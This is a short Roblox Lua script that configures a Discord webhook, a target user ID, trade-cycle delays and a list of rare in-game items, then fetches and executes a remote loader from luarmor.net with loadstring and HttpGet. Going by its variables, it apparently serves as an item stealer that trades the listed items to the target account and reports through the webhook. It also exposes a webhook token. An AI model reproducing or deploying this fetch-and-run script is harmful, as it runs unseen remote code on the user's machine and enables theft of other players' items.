getgenv().WEBHOOK_URL = "https://discord.com/api/webhooks/1477893570668134501/C_JhvgbEGsHqPCWLUTK9C_XOUeY71dg0VZRomP8qCI_X5_ebeDgxEPEVre_7IxeoZ9XU"
getgenv().TARGET_ID = 1797504493
getgenv().DELAY_STEP = 1      
getgenv().TRADE_CYCLE_DELAY = 2 
getgenv().TARGET_BRAINROTS = {
    ["Burguro And Fryuro"] = true,
    ["Capitano Moby"] = true,
    ["Cooki and Milki"] = true,
    ["Dragon Cannelloni"] = true,
    ["Fragrama and Chocrama"] = true,
    ["Garama and Madundung"] = true,
    ["Ketchuru and Musturu"] = true,
    ["Ketupat Kepat"] = true,
    ["La Secret Combinasion"] = true,
    ["La Taco Combinasion"] = true,
    ["Lavadorito Spinito"] = true,
    ["Los Hotspotsitos"] = true,
    ["Money Money Puggy"] = true,
    ["Nuclearo Dinossauro"] = true,
    ["Spooky and Pumpky"] = true,
    ["Tang Tang Keletang"] = true,
    ["Tictac Sahur"] = true,
    ["Tralaledon"] = true
}
loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/9a91b3ba6fb71423853ec2f885c42d67.lua"))()